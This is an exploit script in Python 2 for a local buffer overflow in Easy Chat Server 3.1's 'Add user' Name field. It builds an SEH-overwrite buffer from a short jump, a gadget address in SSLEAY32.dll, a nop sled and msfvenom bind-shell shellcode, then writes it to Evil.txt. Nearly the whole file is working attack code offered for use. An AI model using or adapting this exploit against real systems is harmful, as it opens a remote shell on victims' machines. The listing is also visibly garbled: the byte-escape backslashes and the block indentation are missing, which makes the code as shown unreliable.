#!/usr/bin/env python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Easy Chat Server 3.1 - 'Add user' Local Buffer Overflow #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://www.echatserver.com/index.htm #
# Vulnerable Software: http://www.echatserver.com/ecssetup.exe #
# Tested on : Windows 7 Enterprise SP1 (x64) #
# Steps to reproduce : paste contents of Evil.txt in 'Name:' field under Add user and click OK #
#----------------------------------------------------------------------------------------------------------#

# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -e x86/alpha_mixed -f python -v shellcode
# Payload size: 718 bytes
# Payload emitted by the msfvenom command quoted above (x86/alpha_mixed-encoded
# bind shell), assembled into one str by repeated concatenation.
# NOTE(review): in this copy of the listing the literals read "x89xe3..." rather
# than byte escapes -- the backslashes appear to have been lost in extraction --
# so len(shellcode) below is the length of that literal text, not the 718 bytes
# stated in the header comment.
shellcode = ""
shellcode += "x89xe3xdaxd3xd9x73xf4x5ex56x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x79x6cx6ax48x6bx32x53x30x73x30x77x70"
shellcode += "x43x50x4ex69x7ax45x36x51x79x50x61x74"
shellcode += "x4ex6bx52x70x76x50x6ex6bx62x72x44x4c"
shellcode += "x4cx4bx51x42x72x34x4cx4bx71x62x66x48"
shellcode += "x76x6fx4dx67x63x7ax45x76x50x31x4bx4f"
shellcode += "x6cx6cx65x6cx75x31x63x4cx77x72x44x6c"
shellcode += "x35x70x4ax61x68x4fx74x4dx63x31x5ax67"
shellcode += "x69x72x5ax52x76x32x46x37x6ex6bx52x72"
shellcode += "x44x50x6ex6bx30x4ax75x6cx6ex6bx62x6c"
shellcode += "x66x71x73x48x68x63x77x38x67x71x58x51"
shellcode += "x66x31x6cx4bx31x49x31x30x46x61x59x43"
shellcode += "x6cx4bx37x39x56x78x7ax43x45x6ax50x49"
shellcode += "x4cx4bx74x74x6ex6bx53x31x6ax76x66x51"
shellcode += "x69x6fx6ex4cx59x51x4ax6fx44x4dx76x61"
shellcode += "x6ax67x64x78x6bx50x70x75x4ax56x44x43"
shellcode += "x63x4dx48x78x77x4bx51x6dx67x54x52x55"
shellcode += "x59x74x70x58x4ex6bx66x38x65x74x55x51"
shellcode += "x68x53x63x56x6ex6bx56x6cx70x4bx4ex6b"
shellcode += "x52x78x45x4cx35x51x38x53x6cx4bx56x64"
shellcode += "x6cx4bx67x71x4ax70x6fx79x73x74x71x34"
shellcode += "x45x74x73x6bx43x6bx31x71x73x69x51x4a"
shellcode += "x70x51x59x6fx4dx30x51x4fx73x6fx33x6a"
shellcode += "x4ex6bx36x72x58x6bx6cx4dx33x6dx31x78"
shellcode += "x70x33x57x42x47x70x43x30x35x38x30x77"
shellcode += "x33x43x46x52x53x6fx36x34x61x78x42x6c"
shellcode += "x63x47x54x66x36x67x59x6fx58x55x6dx68"
shellcode += "x4ex70x53x31x55x50x77x70x35x79x7ax64"
shellcode += "x50x54x30x50x65x38x55x79x6bx30x62x4b"
shellcode += "x53x30x39x6fx5ax75x43x5ax33x38x66x39"
shellcode += "x52x70x79x72x59x6dx51x50x76x30x51x50"
shellcode += "x66x30x35x38x79x7ax66x6fx69x4fx59x70"
shellcode += "x39x6fx79x45x6fx67x35x38x66x62x63x30"
shellcode += "x54x51x71x4cx4dx59x49x76x52x4ax56x70"
shellcode += "x66x36x76x37x33x58x78x42x6bx6bx56x57"
shellcode += "x55x37x69x6fx79x45x31x47x33x58x68x37"
shellcode += "x79x79x34x78x4bx4fx4bx4fx49x45x46x37"
shellcode += "x35x38x61x64x38x6cx57x4bx69x71x69x6f"
shellcode += "x4bx65x42x77x4fx67x33x58x44x35x32x4e"
shellcode += "x32x6dx55x31x59x6fx78x55x65x38x30x63"
shellcode += "x52x4dx42x44x57x70x4bx39x79x73x63x67"
shellcode += "x33x67x30x57x36x51x59x66x73x5ax46x72"
shellcode += "x43x69x50x56x49x72x79x6dx51x76x58x47"
shellcode += "x33x74x67x54x47x4cx76x61x66x61x4cx4d"
shellcode += "x57x34x54x64x62x30x78x46x77x70x33x74"
shellcode += "x70x54x42x70x70x56x73x66x30x56x42x66"
shellcode += "x32x76x50x4ex61x46x63x66x52x73x42x76"
shellcode += "x61x78x63x49x78x4cx75x6fx4ex66x6bx4f"
shellcode += "x4ex35x4fx79x69x70x52x6ex70x56x43x76"
shellcode += "x69x6fx64x70x35x38x75x58x6bx37x45x4d"
shellcode += "x33x50x69x6fx5ax75x6fx4bx7ax50x58x35"
shellcode += "x6dx72x33x66x71x78x6dx76x6fx65x4fx4d"
shellcode += "x6dx4dx69x6fx4bx65x35x6cx35x56x73x4c"
shellcode += "x64x4ax6dx50x6bx4bx69x70x70x75x67x75"
shellcode += "x6dx6bx77x37x36x73x42x52x32x4fx51x7a"
shellcode += "x77x70x32x73x39x6fx6bx65x41x41"

# Layout of the 5000-character input the author pastes into the 'Name:' field:
# filler up to the SEH record, then the overwritten nSEH/SEH pair, a nop sled,
# the payload, and tail padding to a fixed total length. This is the classic
# SEH-overwrite shape of a stack overflow; the hardening a defender would check
# for on the vulnerable process is SafeSEH/SEHOP/DEP on the module that hosts
# the gadget (presumably absent here, since the technique depends on it --
# not verifiable from this listing).
# NOTE(review): as in the shellcode block, the escape backslashes appear to be
# missing from these literals in this copy, so 'xcc' is three characters here.
buffer = 'xcc' * 217 # filler: the author's offset from the field to the nSEH slot
buffer += 'x75x06x74x06' # nSEH: author's note "jump net" (presumably "jump next", i.e. a short jump over the SEH record)
buffer += 'x21x7fx01x10' # SEH | 0x10017f21 : pop esi # pop ecx # ret | [SSLEAY32.dll] (author's gadget note)
buffer += 'x90' * 10 # nop sled
buffer += shellcode # bind shell payload assembled above
# Pad to exactly 5000 characters. If the payload ever exceeds 4765 characters the
# multiplier goes negative and Python yields '' (no error), so the total would
# silently be longer than 5000.
buffer += 'xcc' * (5000-217-4-4-10-len(shellcode)) # junk

# Write the assembled input to Evil.txt in the current working directory.
# Python 2 syntax (print statements); the broad except only prints the error
# and lets the script end, so a failed write is reported but not signalled via
# exit status. Indentation of the try/except bodies is lost in this copy of the
# listing (the body lines sit at column 0).
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e